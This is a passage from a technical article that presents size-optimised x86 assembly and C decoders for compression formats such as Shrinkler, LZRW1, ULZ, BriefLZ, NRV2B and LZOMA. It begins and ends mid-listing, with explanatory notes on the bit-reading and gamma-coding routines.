        sub    dx, 1             ; subq.w #1,d6                        
        jne    .init             ; bne.b  .init
        ; D6 = 0
    .lit:
        ; Literal
        add    dl, 1             ; addq.b #1,d6
    .getlit:
        call   GetBit            ; bsr.b  GetBit
        adc    dl, dl            ; addx.b d6,d6
        jnc    .getlit           ; bcc.b  .getlit
      
        mov    [edi], dl         ; move.b d6,(a5)+
        inc    edi
                                 ; bsr.b  ReportProgress
    .switch:
        ; After literal
        call   GetKind           ; bsr.b  GetKind
        jnc    .lit              ; bcc.b  .lit
        ; Reference
        mov    edx, -1           ; moveq.l  #-1,d6
        call   GetBit            ; bsr.b  GetBit
        jnc    .readoffset       ; bcc.b  .readoffset
    .readlength:
        mov    edx, 4            ; moveq.l  #4,d6
        call   GetNumber         ; bsr.b  GetNumber
    .copyloop:
        mov    al, [edi + ebx]   ; move.b (a5,d5.l),(a5)+
        stosb
        sub    ecx, 1            ; subq.l #1,d7
        jne    .copyloop         ; bne.b  .copyloop
                                 ; bsr.b  ReportProgress
        ; After reference
        call   GetKind           ; bsr.b  GetKind
        jnc    .lit              ; bcc.b  .lit
    .readoffset:
        mov    edx, 3            ; moveq.l  #3,d6
        call   GetNumber         ; bsr.b  GetNumber
        mov    ebx, 2            ; moveq.l  #2,d5
        sub    ebx, ecx          ; sub.l  d7,d5
        jne    .readlength       ; bne.b  .readlength
    
        add    esp, 4096         ; lea.l  NUM_CONTEXTS*2(a7),a7
        sub    edi, [esp+32+8]
        mov    [esp+pushad_t.eax], edi
        popad                    ; movem.l  (a7)+,d2-d7/a4-a6
        ret                      ; rts
    
    ReportProgress:
        ; move.l  a2,d0
        ; beq.b .nocallback
        ; move.l  a5,d0
        ; sub.l a6,d0
        ; move.l  a3,a0
        ; jsr (a2)
    .nocallback:
        ; rts
    
    GetKind:
        ; Use parity as context
                                 ; move.l a5,d1
        mov    edx, 1            ; moveq.l  #1,d6
        and    edx, edi          ; and.l  d1,d6
        shl    dx, 8             ; lsl.w  #8,d6
        jmp    GetBit            ; bra.b  GetBit
    
    GetNumber:
        ; EDX = Number context
        ; Out: Number in ECX
        shl    dx, 8             ; lsl.w  #8,d6
    .numberloop:
        add    dl, 2             ; addq.b #2,d6
        call   GetBit            ; bsr.b  GetBit
        jc     .numberloop       ; bcs.b  .numberloop
        mov    ecx, 1            ; moveq.l  #1,d7
        sub    dl, 1             ; subq.b #1,d6
    .bitsloop:
        call   GetBit            ; bsr.b  GetBit
        adc    ecx, ecx          ; addx.l d7,d7
        sub    dl, 2             ; subq.b #2,d6
        jnc    .bitsloop         ; bcc.b  .bitsloop
        ret                      ; rts
    
        ; EDX = Bit context
    
        ; d2 = Range value
        ; d3 = Interval size
        ; d4 = Input bit buffer
    
        ; Out: Bit in C and X
    readbit:
        mov    eax, [ebp+d4]
        add    eax, eax          ; add.l  d4,d4
        jne    nonewword         ; bne.b  nonewword
        lodsd                    ; move.l (a4)+,d4
        bswap  eax               ; data is stored in big-endian format
        adc    eax, eax          ; addx.l d4,d4
    nonewword:
        mov    [ebp+d4], eax 
        mov    [esp+pushad_t.esi], esi
        adc    bx, bx            ; addx.w d2,d2
        add    cx, cx            ; add.w  d3,d3
        jmp    check_interval
    GetBit:
        pushad
        mov    ebx, [ebp+d2]
        mov    ecx, [ebp+d3]
    check_interval:
        test   cx, cx            ; tst.w  d3
        jns    readbit           ; bpl.b  readbit
    
        ; lea.l 4+SINGLE_BIT_CONTEXTS*2(a7,d6.l),a1
        ; add.l d6,a1
        lea    edi, [ebp+prob+2*edx+SINGLE_BIT_CONTEXTS*2]      
        movzx  eax, word[edi]    ; move.w (a1),d1
        ; D1/EAX = One prob
    
        shr    ax, ADJUST_SHIFT  ; lsr.w  #ADJUST_SHIFT,d1
        sub    [edi], ax         ; sub.w  d1,(a1)
        add    ax, [edi]         ; add.w  (a1),d1
        
        mul    cx                ; mulu.w d3,d1
                                 ; swap.w d1
    
        sub    bx, dx            ; sub.w  d1,d2
        jb     .one              ; blo.b  .one
    .zero:
        ; oneprob = oneprob * (1 - adjust) = oneprob - oneprob * adjust
        sub    cx, dx            ; sub.w  d1,d3
        ; 0 in C and X
                                 ; rts
        jmp    exit_get_bit
    .one:
        ; oneprob = 1 - (1 - oneprob) * (1 - adjust) = oneprob - oneprob * adjust + adjust
        ; add.w #$ffff>>ADJUST_SHIFT,(a1)
        add    word[edi], 0xFFFF >> ADJUST_SHIFT 
        mov    cx, dx            ; move.w d1,d3
        add    bx, dx            ; add.w  d1,d2
        ; 1 in C and X
    exit_get_bit:
        mov    word[ebp+d2], bx
        mov    word[ebp+d3], cx
        popad
        ret                      ; rts
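
    The flag handling in GetBit is easier to follow in a higher-level form. What follows is a minimal C model of what the routine above appears to do, written from the listing rather than from the Shrinkler sources. It assumes well-formed input with four readable bytes at every refill, and the `range_dec` type and `rd_*` names are my own.

```c
#include <assert.h>
#include <stdint.h>

#define INIT_ONE_PROB 0x8000
#define ADJUST_SHIFT  4
#define NUM_CONTEXTS  1536

typedef struct {
    const uint8_t *in;        /* compressed data, big-endian 32-bit words */
    uint32_t bitbuf;          /* d4: pending input bits plus a sentinel bit */
    uint16_t value;           /* d2: range value */
    uint16_t interval;        /* d3: interval size */
    uint16_t prob[NUM_CONTEXTS];
} range_dec;

static void rd_init(range_dec *s, const uint8_t *in)
{
    s->in = in;
    s->bitbuf = 0x80000000u;  /* sentinel only, so the first read refills */
    s->value = 0;
    s->interval = 1;
    for (int i = 0; i < NUM_CONTEXTS; i++)
        s->prob[i] = INIT_ONE_PROB;
}

/* Shift one bit out of the buffer; refill when only the sentinel is left. */
static int rd_next_input_bit(range_dec *s)
{
    uint32_t bit = s->bitbuf >> 31;
    s->bitbuf <<= 1;
    if (s->bitbuf == 0) {
        uint32_t w = ((uint32_t)s->in[0] << 24) | ((uint32_t)s->in[1] << 16) |
                     ((uint32_t)s->in[2] << 8)  |  (uint32_t)s->in[3];
        s->in += 4;
        bit = w >> 31;
        s->bitbuf = (w << 1) | 1;  /* re-insert the sentinel */
    }
    return (int)bit;
}

/* Decode one bit in the given context (-1 is allowed, as in the listing). */
static int rd_get_bit(range_dec *s, int ctx)
{
    assert(ctx >= -1 && ctx < NUM_CONTEXTS - 1);

    /* Renormalise until the interval size has its top bit set. */
    while (s->interval < 0x8000) {
        s->value = (uint16_t)((s->value << 1) | rd_next_input_bit(s));
        s->interval = (uint16_t)(s->interval << 1);
    }

    uint16_t *p = &s->prob[ctx + 1];
    uint16_t threshold = (uint16_t)(((uint32_t)s->interval * *p) >> 16);

    *p = (uint16_t)(*p - (*p >> ADJUST_SHIFT));          /* decay towards 0 */
    if (s->value < threshold) {
        *p = (uint16_t)(*p + (0xFFFF >> ADJUST_SHIFT));  /* pull towards 1 */
        s->interval = threshold;
        return 1;
    }
    s->value = (uint16_t)(s->value - threshold);
    s->interval = (uint16_t)(s->interval - threshold);
    return 0;
}
```

    Feeding this model a buffer of zero bytes keeps the range value at zero, so every decoded bit is a one and the probability climbs; a buffer of 0xFF bytes does the opposite.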
    

    The following is my own attempt to implement a size-optimized version of the same depacker in x86 assembly. However, there’s likely room for improvement here, and this code will be updated later.

        %define INIT_ONE_PROB       0x8000
        %define ADJUST_SHIFT        4
        %define SINGLE_BIT_CONTEXTS 1
        %define NUM_CONTEXTS        1536
    
        struc pushad_t
          .edi resd 1
          .esi resd 1
          .ebp resd 1
          .esp resd 1
          .ebx resd 1
          .edx resd 1
          .ecx resd 1
          .eax resd 1
        endstruc
    
        struc shrinkler_ctx
          .esp      resd 1      ; original value of esp before allocation
          .range    resd 1      ; range value
          .ofs      resd 1
          .interval resd 1      ; interval size
        endstruc
    
        bits 32
    
        %ifndef BIN
          global shrinkler_depackx
          global _shrinkler_depackx
        %endif
    
    shrinkler_depackx:
    _shrinkler_depackx:
        pushad
        mov    ebx, [esp+32+4]   ; ebx = outbuf (copied to edi in init_get_bit)
        mov    esi, [esp+32+8]   ; esi = inbuf
    
        mov    eax, esp
        xor    ecx, ecx          ; ecx = 4096
        mov    ch, 10h
        sub    esp, ecx          ; subtract 1 page
        test   [esp], esp        ; stack probe
    
        mov    edi, esp
        stosd                    ; save original value of esp
        cdq
        xchg   eax, edx
        stosd                    ; range value = 0
        stosd                    ; offset = 0
        inc    eax
        stosd                    ; interval length = 1
    
        call   init_get_bit
    GetBit:
        pushad
        mov    ebp, [ebx+shrinkler_ctx.range   ]
        mov    ecx, [ebx+shrinkler_ctx.interval]
        jmp    check_interval
    readbit:
        add    al, al
        jne    nonewword
        lodsb
        adc    al, al
    nonewword:
        mov    [esp+pushad_t.eax], eax
        mov    [esp+pushad_t.esi], esi
        adc    ebp, ebp
        add    ecx, ecx
    check_interval:
        test   cx, cx
        jns    readbit
    
        lea    edi, [shrinkler_ctx_size + ebx + 2*edx + SINGLE_BIT_CONTEXTS*2]
        mov    ax, word[edi]
    
        shr    eax, ADJUST_SHIFT
        sub    [edi], ax
        add    ax, [edi]
    
        cdq
        mul    cx
    
        sub    ebp, edx
        jc    .one
    .zero:
        ; oneprob = oneprob * (1 - adjust) = oneprob - oneprob * adjust
        sub    ecx, edx
        ; 0 in C and X
        jmp    exit_getbit
    .one:
        ; oneprob = 1 - (1 - oneprob) * (1 - adjust) = oneprob - oneprob * adjust + adjust
        add    word[edi], (0xFFFF >> ADJUST_SHIFT)
        xchg   edx, ecx
        add    ebp, ecx
        ; 1 in C and X
    exit_getbit:
        mov    [ebx+shrinkler_ctx.range   ], ebp
        mov    [ebx+shrinkler_ctx.interval], ecx
        popad
        ret
    GetKind:
        ; Use parity as context
        mov    edx, edi
        and    edx, 1
        shl    edx, 8
        jmp    ebp
    GetNumber:
        cdq
        adc    dh, 3
    .numberloop:
        inc    edx
        inc    edx
        call   ebp
        jc    .numberloop
        push   1
        pop    ecx
        dec    edx
    .bitsloop:
        call   ebp
        adc    ecx, ecx
        sub    dl, 2
        jnc   .bitsloop
        ret
    
    init_get_bit:
        pop    ebp               ; ebp = GetBit
    
        ; Init probabilities
        mov    ch, NUM_CONTEXTS >> 8
        xor    eax, eax
        mov    ah, 1<<7
        rep    stosw
        xchg   al, ah
    
        mov    edi, ebx
        mov    ebx, esp
    
        ; edx = 0
        cdq
    .lit:
        ; Literal
        inc    edx
    .getlit:
        call   ebp
        adc    dl, dl
        jnc    .getlit
    
        mov    [edi], dl
        inc    edi
    .switch:
        ; After literal
        call   GetKind
        jnc    .lit
    
        ; Reference
        cdq
        dec    edx
        call   ebp
        jnc    .readoffset
    .readlength:
        clc
        call   GetNumber
        push   esi
        mov    esi, edi
        add    esi, dword[ebx+shrinkler_ctx.ofs]
        rep    movsb
        pop    esi
    
        ; After reference
        call   GetKind
        jnc   .lit
    .readoffset:
        stc
        call   GetNumber
        neg    ecx
        inc    ecx
        inc    ecx
        mov    [ebx+shrinkler_ctx.ofs], ecx
        jne   .readlength
    
        ; return depacked length
        mov    esp, [ebx+shrinkler_ctx.esp]
        sub    edi, [esp+32+4]
        mov    [esp+pushad_t.eax], edi
        popad
        ret
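
    GetNumber is probably the least obvious routine in both listings. The C sketch below is my reading of it: a unary prefix counts how many data bits follow, using even context offsets on the way up and odd ones on the way back down. The `replay_t` bit source is a hypothetical test stub that ignores the context, and `get_number` is an illustrative name.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical bit source: replays a string of '0'/'1' characters. */
typedef struct {
    const char *bits;
} replay_t;

static int replay_bit(replay_t *r, unsigned ctx)
{
    (void)ctx;  /* a real decoder would select a probability with this */
    assert(*r->bits == '0' || *r->bits == '1');
    return *r->bits++ - '0';
}

/* base is 3 for offsets and 4 for lengths in the listings above. */
static uint32_t get_number(replay_t *r, unsigned base)
{
    unsigned ctx = base << 8;
    unsigned i = 0;
    uint32_t num = 1;

    /* Prefix: step through contexts 2, 4, 6, ... until a 0 bit arrives. */
    do {
        i += 2;
    } while (replay_bit(r, ctx + i));

    /* Payload: i/2 data bits, read with contexts i-1, i-3, ..., 1. */
    for (int k = (int)i - 1; k >= 1; k -= 2)
        num = (num << 1) | (uint32_t)replay_bit(r, ctx + (unsigned)k);

    return num;
}
```

    The smallest value this can produce is 2. In the offset context the decoder computes `2 - number`, so a decoded 2 gives an offset of zero, which the main loop treats as the end of the stream.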
    

    12. C/x86 assembly

    The following algorithms were translated from C to x86 assembly or were already implemented in x86 assembly and optimized for size.

    12.1 Lempel-Ziv Ross Williams (LZRW)

    Designed by Ross Williams and described in An Extremely Fast Ziv-Lempel Data Compression Algorithm published in 1991. Its compression ratio is only slightly worse than LZ77, but it compresses much faster.

    lzrw1_depack:
    _lzrw1_depack:
        pushad
        lea    esi, [esp+32+4]
        lodsd
        xchg   edi, eax        ; edi = outbuf
        lodsd
        xchg   ebp, eax        ; ebp = inlen
        lodsd
        xchg   esi, eax        ; esi = inbuf
        add    ebp, esi        ; ebp = inbuf + inlen
    L0:
        push   16 + 1          ; bits = 16
        pop    edx
        lodsw                  ; ctrl = *in++, ctrl |= (*in++) << 8
        xchg   ebx, eax        
    L1:
        ; while(in != end) {
        cmp    esi, ebp
        je     L4
        ; if(--bits == 0) goto L0
        dec    edx
        jz     L0
    L2:
        ; if(ctrl & 1) {
        shr    ebx, 1
        jc     L3
        movsb                  ; *out++ = *in++;
        jmp    L1
    L3:
        lodsb                  ; ofs = (*in & 0xF0) << 4
        aam    16
        cwde
        movzx  ecx, al
        inc    ecx
        lodsb                  ; ofs |= *in++ & 0xFF;
        push   esi             ; save pointer to in
        mov    esi, edi        ; ptr  = out - ofs;
        sub    esi, eax
        rep    movsb           ; while(len--) *out++ = *ptr++;
        pop    esi             ; restore pointer to in
        jmp    L1
    L4:
        sub    edi, [esp+32+4] ; edi = out - outbuf
        mov    [esp+28], edi   ; esp+_eax = edi
        popad
        ret
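
    The item format that the routine above decodes can also be written out in C. This is a reading of the assembly, not Ross Williams’ reference code. It assumes a well-formed stream with no header: a 16-bit little-endian control word, followed by up to sixteen items. The name `lzrw1_depack_c` is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Returns the number of bytes written to out. */
static uint32_t lzrw1_depack_c(uint8_t *out, uint32_t inlen, const uint8_t *in)
{
    const uint8_t *end = in + inlen;
    uint8_t *start = out;

    assert(out != 0 && in != 0);

    while (in < end) {
        /* One control bit per item, least significant bit first. */
        uint32_t ctrl = (uint32_t)in[0] | ((uint32_t)in[1] << 8);
        in += 2;

        for (int bits = 16; bits > 0 && in < end; bits--, ctrl >>= 1) {
            if (ctrl & 1) {
                /* Copy item: low nibble = length - 1,
                 * high nibble + next byte = 12-bit offset. */
                uint32_t len = (uint32_t)(in[0] & 0x0F) + 1;
                uint32_t ofs = ((uint32_t)(in[0] & 0xF0) << 4) | in[1];
                const uint8_t *ptr = out - ofs;

                in += 2;
                while (len--) *out++ = *ptr++;
            } else {
                *out++ = *in++;  /* literal item */
            }
        }
    }
    return (uint32_t)(out - start);
}
```

    For example, the seven bytes `08 00 'a' 'b' 'c' 02 03` describe three literals followed by a copy of length 3 at offset 3, which expands to `abcabc`.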
    

    12.2 Ultra-fast LZ (ULZ)

    Ultra-fast LZ was first published by Ilya “encode” Muravyov in 2010 and then appears to have been open sourced in 2019. The following code is a straightforward translation of the C decoder to x86 assembly.

    static uint32_t add_mod(uint32_t x, uint8_t** p);
    
    uint32_t ulz_depack(
      void *outbuf,
      uint32_t inlen,
      const void *inbuf) 
    {
        uint8_t  *ptr, *in, *end, *out;
        uint32_t dist, len;
        uint8_t  token;
    
        out = (uint8_t*)outbuf;
        in  = (uint8_t*)inbuf;
        end = in + inlen;
        
        while(in < end) {
          token = *in++;
          if(token >= 32) {
            len = token >> 5;
            if(len == 7) 
              len = add_mod(len, &in);
            while(len--) *out++ = *in++;
            if(in >= end) break;
          }
          len = (token & 15) + 4;
          if(len == (15 + 4)) 
            len = add_mod(len, &in);
          dist = ((token & 16) << 12) + *(uint16_t*)in;
          in += 2;
          ptr = out - dist;
          while(len--) *out++ = *ptr++;
        }
        return (uint32_t)(out - (uint8_t*)outbuf);
    }
    
    static uint32_t add_mod(uint32_t x, uint8_t** p) {
        uint8_t c, i;
        
        for(i=0; i<=21; i+=7) {
          c = *(*p)++;
          x += (c << i);
          if(c < 128) break;
        }
        return x;
    }
    
    ulz_depack:
    _ulz_depack:
        pushad
        lea    esi, [esp+32+4]
        lodsd
        xchg   edi, eax          ; edi = outbuf
        lodsd
        xchg   ebx, eax
        lodsd
        xchg   esi, eax          ; esi = inbuf
        add    ebx, esi          ; ebx += inbuf
    ulz_main:
        xor    ecx, ecx
        mul    ecx
        ; while (in < end) {
        cmp    esi, ebx
        jnb    ulz_exit
        ; token = *in++;
        lodsb
        ; if(token >= 32) {
        cmp    al, 32
        jb     ulz_copy2
        ; len = token >> 5
        mov    cl, al
        shr    cl, 5
        ; if(len == 7)
        cmp    cl, 7
        jne    ulz_copy1
        ; len = add_mod(len, &in);
        call   add_mod
    ulz_copy1:
        ; while(len--) *out++ = *in++;
        rep    movsb
        ; if(in >= end) break;
        cmp    esi, ebx
        jae    ulz_exit
    ulz_copy2:
        ; len = (token & 15) + 4;
        mov    cl, al
        and    cl, 15
        add    cl, 4
        ; if(len == (15 + 4))
        cmp    cl, 15 + 4
        jne    ulz_copy3
        ; len = add_mod(len, &in);
        call   add_mod
    ulz_copy3:
        ; dist = ((token & 16) << 12) + *(uint16_t*)in;
        and    al, 16
        shl    eax, 12
        xchg   eax, edx
        ; eax = *(uint16_t*)in;
        ; in += 2;
        lodsw
        add    edx, eax
        ; p = out - dist
        push   esi
        mov    esi, edi
        sub    esi, edx
        ; while(len--) *out++ = *p++;
        rep    movsb
        pop    esi
        jmp    ulz_main
        ; }
    ulz_exit:
        ; return (uint32_t)(out - (uint8_t*)outbuf);
        sub    edi, [esp+32+4]   ; outbuf is the first argument
        mov    [esp+28], edi
        popad
        ret
        
    ; static uint32_t add_mod(uint32_t x, uint8_t** p);
    add_mod:
        push   eax               ; save eax
        xchg   eax, ecx          ; eax = len
        xor    ecx, ecx          ; i = 0
    am_loop:
        mov    dl, byte[esi]     ; c = *(*p)++
        inc    esi
        push   edx               ; save c
        shl    edx, cl           ; x += (c << i)
        add    eax, edx
        pop    edx               ; restore c
        cmp    dl, 128           ; if(c < 128) break;
        jb     am_exit
        add    cl, 7             ; i+=7
        cmp    cl, 21            ; i<=21
        jbe    am_loop
    am_exit:
        xchg   eax, ecx          ; ecx = len
        pop    eax               ; restore eax
        ret
    

    12.3 BriefLZ

    Designed by Jørgen Ibsen and published in 2015. BriefLZ combines fast encoding and decoding with a good compression ratio. Ibsen uses 16-bit tags instead of 8-bit ones to improve performance on 16-bit architectures. It encodes the match reference length and offset using Elias gamma coding. The following size-optimized decoder in x86 assembly is only 92 bytes.

    blz_depack:
    _blz_depack:
        pushad
        lea    esi, [esp+32+4]   ; 
        lodsd
        xchg   edi, eax          ; bs.dst = outbuf
        lodsd
        lea    ebx, [edi+eax]    ; end = bs.dst + outlen
        lodsd
        xchg   esi, eax          ; bs.src = inbuf
        call   blz_init_getbit
    blz_getbit:
        add    ax, ax            ; tag <<= 1 
        jnz    blz_exit_getbit   ; continue for all bits
        lodsw                    ; read 16-bit tag
        adc    ax, ax            ; carry over previous bit
    blz_exit_getbit:
        ret
    blz_init_getbit:
        pop    ebp               ; ebp = blz_getbit
        mov    ax, 8000h         ; 
    blz_literal:
        movsb                    ; *out++ = *bs.src++
    blz_main:
        cmp    edi, ebx          ; while(out < end)
        jnb    blz_exit
        
        call   ebp               ; cf = blz_getbit
        jnc    blz_literal       ; if(cf==0) goto blz_literal
                                 ; 
    blz_getgamma:
        pushfd                   ; save cf
        cdq                      ; result = 1
        inc    edx
    blz_gamma_loop:
        call   ebp               ; cf = blz_getbit()
        adc    edx, edx          ; result = (result << 1) + cf
        call   ebp               ; cf = blz_getbit()
        jc     blz_gamma_loop    ; while(cf == 1)
        
        popfd                    ; restore cf
        cmovc  ecx, edx          ; ecx = cf ? edx : ecx
        cmc                      ; complement carry
        jnc    blz_getgamma      ; loop twice
        
        ; ofs = blz_getgamma(&bs) - 2;
        dec    edx
        dec    edx
        
        ; len = blz_getgamma(&bs) + 2;
        inc    ecx
        inc    ecx
        
        ; ofs = (ofs << 8) + (uint32_t)*bs.src++ + 1;
        shl    edx, 8
        mov    dl, [esi]
        inc    esi
        inc    edx
        
        ; ptr = out - ofs;
        push   esi
        mov    esi, edi
        sub    esi, edx
        rep    movsb
        pop    esi
        jmp    blz_main
    blz_exit:
        ; return (out - (uint8_t*)outbuf);
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
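
    The two building blocks of the decoder above, the 16-bit tag reader and the gamma decoder, can be sketched in C as follows. This is modelled on the assembly listing rather than on the BriefLZ library source, and the `tag_bits`, `tag_getbit` and `gamma_decode` names are hypothetical. It assumes the tag starts at 0x8000, as in the listing, and that the input is well formed.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    const uint8_t *src;  /* next unread input byte */
    uint16_t tag;        /* pending bits plus a sentinel; start at 0x8000 */
} tag_bits;

/* Return the next bit, reloading a 16-bit little-endian tag when empty. */
static int tag_getbit(tag_bits *bs)
{
    int bit = bs->tag >> 15;
    bs->tag = (uint16_t)(bs->tag << 1);

    if (bs->tag == 0) {  /* only the sentinel was left */
        uint16_t w = (uint16_t)(bs->src[0] | (bs->src[1] << 8));
        bs->src += 2;
        bit = w >> 15;
        bs->tag = (uint16_t)((w << 1) | 1);  /* re-insert the sentinel */
    }
    return bit;
}

/* Interleaved gamma code: a data bit, then a "more bits follow" flag. */
static uint32_t gamma_decode(tag_bits *bs)
{
    uint32_t result = 1;

    do {
        result = (result << 1) + (uint32_t)tag_getbit(bs);
    } while (tag_getbit(bs));

    assert(result >= 2);  /* at least one data bit is always read */
    return result;
}
```

    With the tag word 0x6000 (bytes `00 60`), the first call to `gamma_decode` reads the bits 0, 1, 1, 0 and returns 5; the next call reads 0, 0 and returns 2, the smallest value the code can express.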
    

    12.4 Not Really Vanished (NRV)

    Designed by Markus F.X.J. Oberhumer and used in the famous Ultimate Packer for eXecutables (UPX). NRV uses an LZ77 format with Elias gamma coding for the reference match offset and length. The following x86 assembly derived from n2b_d_s1.asm in the UCL library is currently 115 bytes.

    nrv2b_depack:
    _nrv2b_depack:
        pushad
        mov    edi, [esp+32+4]   ; output
        mov    esi, [esp+32+8]   ; input
        
        xor    ecx, ecx
        mul    ecx
        dec    edx
        mov    al, 0x80
        
        call   init_get_bit
        ; read next bit from input
        add    al, al
        jnz    exit_get_bit
        
        lodsb
        adc    al, al
    exit_get_bit:             
        ret
    init_get_bit:
        pop    ebp
        jmp    nrv2b_main
        ; copy literal
    nrv2b_copy_byte:
        movsb
    nrv2b_main:
        call   ebp
        jc     nrv2b_copy_byte
        
        push   1
        pop    ebx
    nrv2b_match:
        call   ebp
        adc    ebx, ebx
        
        call   ebp
        jnc    nrv2b_match
        
        sub    ebx, 3
        jb     nrv2b_offset
        
        shl    ebx, 8
        mov    bl, [esi]
        inc    esi
        xor    ebx, -1
        jz     nrv2b_exit
        
        xchg   edx, ebx
    nrv2b_offset:
        call   ebp
        adc    ecx, ecx
        
        call   ebp
        adc    ecx, ecx
        jnz    nrv2b_copy_bytes
        
        inc    ecx
    nrv2b_len:
        call   ebp
        adc    ecx, ecx
        
        call   ebp
        jnc    nrv2b_len
        
        inc    ecx
        inc    ecx
    nrv2b_copy_bytes:
        cmp    edx, -0xD00
        adc    ecx, 1
        push   esi
        lea    esi, [edi + edx]
        rep    movsb
        pop    esi
        jmp    nrv2b_main
    nrv2b_exit:
        ; return depacked length
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
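
    For comparison with the assembly, here is a compact C sketch of the same NRV2B decoding loop with an 8-bit bit buffer. It follows the structure of the listing above and of the UCL decoder as I understand it, so treat it as an approximation rather than the library’s code. It performs no bounds checking and assumes a well-formed stream; `nrv_bits`, `nrv_getbit` and `nrv2b_depack_c` are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    const uint8_t *src;  /* next unread input byte */
    uint32_t bb;         /* bit buffer with a sentinel; 0 means empty */
} nrv_bits;

static uint32_t nrv_getbit(nrv_bits *b)
{
    if ((b->bb & 0x7F) == 0)
        b->bb = (uint32_t)(*b->src++) * 2 + 1;  /* reload, add sentinel */
    else
        b->bb *= 2;
    return (b->bb >> 8) & 1;
}

/* Returns the number of bytes written to out. */
static uint32_t nrv2b_depack_c(uint8_t *out, const uint8_t *in)
{
    nrv_bits b = { in, 0 };
    uint8_t *start = out;
    uint32_t last_off = 1;

    assert(out != 0 && in != 0);

    for (;;) {
        while (nrv_getbit(&b))  /* 1 = literal byte follows */
            *out++ = *b.src++;

        /* Gamma-coded offset prefix; a flag bit of 1 ends the number. */
        uint32_t off = 1;
        do {
            off = off * 2 + nrv_getbit(&b);
        } while (!nrv_getbit(&b));

        if (off == 2) {
            off = last_off;  /* reuse the previous offset */
        } else {
            off = (off - 3) * 256 + *b.src++;
            if (off == 0xFFFFFFFFu) break;  /* end-of-stream marker */
            last_off = ++off;
        }

        uint32_t len = nrv_getbit(&b);
        len = len * 2 + nrv_getbit(&b);
        if (len == 0) {  /* long length: another gamma code */
            len = 1;
            do {
                len = len * 2 + nrv_getbit(&b);
            } while (!nrv_getbit(&b));
            len += 2;
        }
        len += (off > 0xD00) + 1;  /* distant matches are one byte longer */

        const uint8_t *ptr = out - off;
        while (len--) *out++ = *ptr++;
    }
    return (uint32_t)(out - start);
}
```

    The `cmp edx, -0xD00` / `adc ecx, 1` pair in the assembly corresponds to the `len += (off > 0xD00) + 1` line here, because the assembly keeps the offset negated in `edx`.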
    

    12.5 Lempel-Ziv-Markov chain Algorithm (LZMA)

    Designed by Igor Pavlov and published in 1998 with the 7-Zip archiver. It’s an LZ77 variant with features similar to LZX used for Microsoft CAB files and compressed help (CHM) files. LZMA uses an arithmetic coder to store compressed data as a stream of bits resulting in high compression ratios that inspired the development of Packfire, KKrunchy, and LZOMA, to name a few. There’s a description by Charles Bloom in De-obfuscating LZMA and by Matt Mahoney in Data Compression Explained. Alex Ionescu has also published a minimal implementation with very detailed and helpful comments included in the source. Another size-optimized version is available from the UPX LZMA SDK. The arithmetic coder for LZMA usually requires 16KB of RAM and may not be suitable for devices with limited resources. mudlord’s Win32 executable packer called mupack has an x86 implementation.

    Although the compression ratio is excellent and the speed is acceptable for small files, the complexity of the decompressor, for only a few additional percent in compression ratio, didn’t merit an implementation in x86 assembly. I’d be willing to implement it on a better architecture like ARM64, but not x86. Shrinkler, KKrunchy, and LZOMA all offer ~55% ratios with much smaller RAM and ROM requirements that seem more suitable for executable compression.

    12.6 Lempel–Ziv–Oberhumer-Markov Algorithm (LZOMA)

    Designed by Alexandr Efimov and published in 2015. LZOMA is designed specifically for decompression of the Linux kernel but is also suitable for decompressing PE or ELF files. It’s primarily based on ideas used by LZMA and LZO. It provides fast decompression like LZO, and a simplified LZMA format provides a high compression ratio. The trade-off is slow compression requiring a lot of memory. It’s possible to improve the compression ratio by using a real entropy encoder, but at the expense of decompression speed. While it’s still only an experimental algorithm and probably needs more testing, the following is a decoder in C and handwritten x86 assembly.

    typedef struct _lzoma_ctx {
        uint32_t w;
        uint8_t  *src;
    } lzoma_ctx;
    
    static uint8_t get_bit(lzoma_ctx *c) {
        uint32_t cy, x;
        
        x = c->w;
        c->w <<= 1;
    
        // no bits left?
        if(c->w == 0) {
          // read 32-bit word
          x = *(uint32_t*)c->src;
          // advance input
          c->src += 4;
          // double with carry
          c->w = (x << 1) | 1;
        }
        // return carry bit
        return (x >> 31);
    }
     
    void lzoma_depack(
      void *outbuf, 
      uint32_t inlen, 
      const void *inbuf) 
    {
        uint8_t   *out, *ptr, *end;
        uint32_t  cf, top, total, len, ofs, x, res;
        lzoma_ctx c;
    
        c.w    = 1 << 31;
        c.src  = (uint8_t*)inbuf;
        out    = (uint8_t*)outbuf;
        end    = out + inlen;
        
        // copy first byte
        *out++ = *c.src++;
        len    = 0;
        ofs    = -1;
    
        while(out < end) {
          for(;;) {
            // if bit carried, break
            if(cf = get_bit(&c)) break;
            // copy byte
            *out++ = *c.src++;
            len = 2;
          }
          // unpack lz
          if(len) {
            cf = get_bit(&c);
          }
          // carry?
          if(cf) {
            len   = 3;
            total = out - (uint8_t*)outbuf;        
            top   = ((total <= 400000) ? 60 : 50); 
            ofs   = 0;                             
            x     = 256;                           
            res   = *c.src++;                      
            
            for(;;) {
              x += x;
              if(x >= (total + top)) {
                x -= total;
                if(res >= x) { 
                  cf = get_bit(&c);
                  res = (res << 1) + cf;
                  res -= x;
                }
                break;
              }      
              // magic?
              if(x & (0x002FFE00 << 1)) {
                top = (((top << 3) + top) >> 3);
              }
              if(res < top) break;
              
              ofs -= top;
              total += top;
              top <<= 1;
              cf = get_bit(&c);
              res = (res << 1) + cf;
            }
            ofs += res + 1;
            // long length?
            if(ofs >= 5400) len++;
            // huge length?
            if(ofs >= 0x060000) len++;
            // negate
            ofs = -ofs;
          }
          
          if(get_bit(&c)) {
            len += 2;
            res = 0;
            for(;;) { 
              cf = get_bit(&c);
              res = (res << 1) + cf;
              if(!get_bit(&c)) break;
              res++;
            }
            len += res;
          } else {
            cf = get_bit(&c); 
            len += cf;
          }
          ptr = out + ofs;
          while(--len) *out++ = *ptr++;
        }
    }
    

    The algorithm doesn’t translate that well to x86 assembly. It does, however, avoid having to use lots of RAM, which is a plus.

    lzoma_depack:
    _lzoma_depack:
        pushad                   ; save all registers
        lea    esi, [esp+32+4]
        lodsd
        xchg   edi, eax          ; edi = outbuf
        lodsd
        xchg   ebp, eax          ; ebp = inlen
        add    ebp, edi          ; ebp += out
        lodsd
        xchg   esi, eax          ; esi = inbuf
        pushad                   ; save esi, edi and ebp
        call   init_getbit
    get_bit:
